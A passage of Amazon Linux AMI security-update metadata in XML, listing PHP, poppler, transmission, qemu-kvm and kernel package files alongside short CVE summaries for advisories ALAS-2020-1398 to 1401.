arch="i686"><filename>Packages/php72-dba-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.31" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-tidy-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.19" 
release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.19" release="1.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-process-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.19" 
release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-soap" 
version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.19" 
release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.19-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1398</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1398: medium priority package update for poppler</title><issued date="2020-07-14 02:14:00" /><updated date="2020-07-15 17:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9959:
The JPXStream::init function in Poppler 0.78.0 and earlier doesn't check for negative values of stream length, leading to an Integer Overflow, thereby making it possible to allocate a large memory chunk on the heap, with a size controlled by an attacker, as demonstrated by pdftocairo.
1732340: CVE-2019-9959 poppler: integer overflow in JPXStream::init function leading to memory consumption
CVE-2019-12293:
In Poppler through 0.76.1, there is a heap-based buffer over-read in JPXStream::init in JPEG2000Stream.cc via data with inconsistent heights or widths.
1713582: CVE-2019-12293 poppler: heap-based buffer over-read in JPXStream::init in JPEG2000Stream.cc
CVE-2019-11459:
The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to uninitialized memory use when processing certain TIFF image files.
1716295: CVE-2019-11459 evince: uninitialized memory use in function tiff_document_render() and tiff_document_get_thumbnail()
CVE-2019-10871:
An issue was discovered in Poppler 0.74.0. There is a heap-based buffer over-read in the function PSOutputDev::checkPageSlice at PSOutputDev.cc.
1696636: CVE-2019-10871 poppler: heap-based buffer over-read in function PSOutputDev::checkPageSlice in PSOutputDev.cc
CVE-2018-21009:
Poppler before 0.66.0 has an integer overflow in Parser::makeStream in Parser.cc.
1753850: CVE-2018-21009 poppler: integer overflow in Parser::makeStream in Parser.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-21009" title="" id="CVE-2018-21009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10871" title="" id="CVE-2019-10871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11459" title="" id="CVE-2019-11459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12293" title="" id="CVE-2019-12293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9959" title="" id="CVE-2019-9959" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-utils" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" 
version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-42.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1399</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1399: medium priority package update for transmission</title><issued date="2020-07-14 02:15:00" /><updated date="2020-07-15 17:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2018-10756:
Use-after-free in libtransmission/variant.c in Transmission before 3.00 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted torrent file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10756" title="" id="CVE-2018-10756" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transmission" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-debuginfo-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-daemon" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-daemon-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-cli-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-common" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-common-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-debuginfo-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission-cli" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-cli-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission-daemon" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-daemon-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission-common" version="3.00" release="1.1.amzn1" epoch="0" 
arch="i686"><filename>Packages/transmission-common-3.00-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1400</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1400: important priority package update for qemu-kvm</title><issued date="2020-07-14 20:27:00" /><updated date="2020-07-15 17:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8608:
In libslirp 4.1.0, as used in QEMU 4.2.0, tcp_subr.c misuses snprintf return values, leading to a buffer overflow in later code.
1798453: CVE-2020-8608 QEMU: Slirp: potential OOB access due to unsafe snprintf() usages
CVE-2020-7039:
tcp_emu in tcp_subr.c in libslirp 4.1.0, as used in QEMU 4.2.0, mismanages memory, as demonstrated by IRC DCC commands in EMU_IRC. This can cause a heap-based buffer overflow or other out-of-bounds access, which can lead to a DoS or potentially the execution of arbitrary code.
1791551: CVE-2020-7039 QEMU: slirp: OOB buffer access while emulating tcp protocols in tcp_emu()
CVE-2019-9824:
tcp_emu in slirp/tcp_subr.c (aka slirp/src/tcp_subr.c) in QEMU 3.0.0 uses uninitialized data in an snprintf call, leading to information disclosure.
1678515: CVE-2019-9824 QEMU: slirp: information leakage in tcp_emu() due to uninitialized stack variables
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9824" title="" id="CVE-2019-9824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7039" title="" id="CVE-2020-7039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8608" title="" id="CVE-2020-8608" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1401</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1401: important priority package update for kernel</title><issued date="2020-07-14 21:14:00" /><updated date="2020-07-15 17:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12771:
An issue was discovered in the Linux kernel through 5.6.11. btree_gc_coalesce in drivers/md/bcache/btree.c has a deadlock if a coalescing operation fails.
1834862: CVE-2020-12771 kernel: deadlock if a coalescing operation fails in btree_gc_coalesce function in drivers/md/bcache/btree.c
CVE-2020-10768:
A flaw was found in the prctl() function, where it can be used to enable indirect branch speculation after it has been disabled. This call incorrectly reports it as being 'force disabled' when it is not and opens the system to Spectre v2 attacks. The highest threat from this vulnerability is to confidentiality.
1845868: CVE-2020-10768 kernel: Indirect branch speculation can be enabled after it was force-disabled by the PR_SPEC_FORCE_DISABLE prctl command.
CVE-2020-10767:
A flaw was found in the Linux kernel's implementation of the Enhanced IBPB (Indirect Branch Prediction Barrier). The IBPB mitigation will be disabled when STIBP is not available or when the Enhanced Indirect Branch Restricted Speculation (IBRS) is available. This flaw allows a local attacker to perform a Spectre V2 style attack when this configuration is active. The highest threat from this vulnerability is to confidentiality.
CVE-2020-10766:
A logic bug flaw was found in the Linux kernel's implementation of SSBD. A bug in the logic handling allows an attacker with a local account to disable SSBD protection during a context switch when additional speculative execution mitigations are in place. This issue was introduced when the per task/process conditional STIBP switching was added on top of the existing SSBD switching. The highest threat from this vulnerability is to confidentiality.
CVE-2020-10757:
A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system.
1842525: CVE-2020-10757 kernel: DAX hugepages not considered during mremap
CVE-2020-10732:
A flaw was found in the Linux kernel's implementation of Userspace core dumps. This flaw allows an attacker with a local account to crash a trivial program and exfiltrate private kernel data.
1831399: CVE-2020-10732 kernel: uninitialized kernel data leak in userspace coredumps
CVE-2020-0543:
Incomplete cleanup from specific special register read operations in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
A new domain bypass transient execution attack known as Special Register Buffer Data Sampling (SRBDS) has been found. This flaw allows data values from special internal registers to be leaked by an attacker able to execute code on any core of the CPU. An unprivileged, local attacker can use this flaw to infer values returned by affected instructions known to be commonly used during cryptographic operations that rely on uniqueness, secrecy, or both.
1827165: CVE-2020-0543 hw: Special Register Buffer Data Sampling (SRBDS)
CVE-2019-19462:
relay_open in kernel/relay.c in the Linux kernel through 5.4.1 allows local users to cause a denial of service (such as relay blockage) by triggering a NULL alloc_percpu result.
1781839: CVE-2019-19462 kernel: NULL pointer dereference in relay_open in kernel/relay.c
CVE-2018-20669:
An issue was discovered in i915_gem_execbuffer2_ioctl in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the Linux kernel through 4.19.13, where a user-provided address is not checked with access_ok(). A local attacker can craft a malicious IOCTL function call to overwrite arbitrary kernel memory, resulting in a denial of service or privilege escalation.
1669141: CVE-2018-20669 kernel: missing access_ok() checks in i915_gem_execbuffer2_ioctl() results in privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20669" title="" id="CVE-2018-20669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19462" title="" id="CVE-2019-19462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0543" title="" id="CVE-2020-0543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10732" title="" id="CVE-2020-10732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10757" title="" id="CVE-2020-10757" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10766" title="" id="CVE-2020-10766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10767" title="" id="CVE-2020-10767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10768" title="" id="CVE-2020-10768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12771" title="" id="CVE-2020-12771" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.186" release="110.268.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" 
